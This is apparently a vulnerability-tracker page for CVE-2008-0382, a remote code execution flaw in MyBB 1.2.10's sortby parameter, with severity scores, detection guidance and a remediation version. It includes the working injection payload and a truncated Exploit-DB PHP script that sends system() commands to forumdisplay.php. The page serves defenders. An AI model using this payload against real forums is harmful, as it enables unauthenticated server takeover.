CVE-2008-0382
published 2008-01-22CVE-2008-0382: Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1)…
PriorityP261high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
41.87%
98.5th percentile
Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1) forumdisplay.php or (2) a results action in search.php.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandforumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['↗
- →Detect eval injection attempts via the `sortby` GET parameter containing PHP injection payloads (e.g., `'];`, `phpinfo()`, `system(`, `readfile(`) in requests to forumdisplay.php or search.php. ↗
- →Monitor for the exploit's output delimiter pattern — asterisk-wrapped command output (`*<output>*`) in HTTP responses, used by the exploit script to parse remote command execution results. ↗
- →Requests to search.php must include `action=results` alongside a malicious `sortby` parameter; detection rules should match both parameters together for this attack vector. ↗
- →No authentication is required for exploitation; the attacker only needs a valid forum `fid` (for forumdisplay.php) or a valid search `sid` (for search.php), both of which are trivially obtainable. ↗
- ·The forumdisplay.php attack vector requires a valid forum `fid` to be known by the attacker, but this is typically publicly visible in any forum listing. ↗
- ·The search.php attack vector requires a valid search `sid`, but the advisory notes this is a trivial prerequisite to satisfy. ↗
- ·Both RCE vectors are present in MyBB 1.2.10 and earlier; upgrading to 1.2.11 remediates the vulnerability. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
exploitdb·2008-01-16
CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB
# milw0rm.com [2008-01-16]
Exploit-DB
MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities
exploitdb·2008-01-16
CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities
MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities
---
[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
Author: Janek Vind "waraxe"
Independent discovery: koziolek
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-61.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.
Vulnerabilities discovered
1. Remote Code Execution in "forumdisplay.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditio
No writeups or analysis indexed.
http://secunia.com/advisories/28509http://securityreason.com/securityalert/3559http://www.securityfocus.com/archive/1/486434/100/0/threadedhttp://www.securityfocus.com/bid/27322https://www.exploit-db.com/exploits/4927https://www.exploit-db.com/exploits/4928http://secunia.com/advisories/28509http://securityreason.com/securityalert/3559http://www.securityfocus.com/archive/1/486434/100/0/threadedhttp://www.securityfocus.com/bid/27322https://www.exploit-db.com/exploits/4927https://www.exploit-db.com/exploits/4928
2008-01-22
Published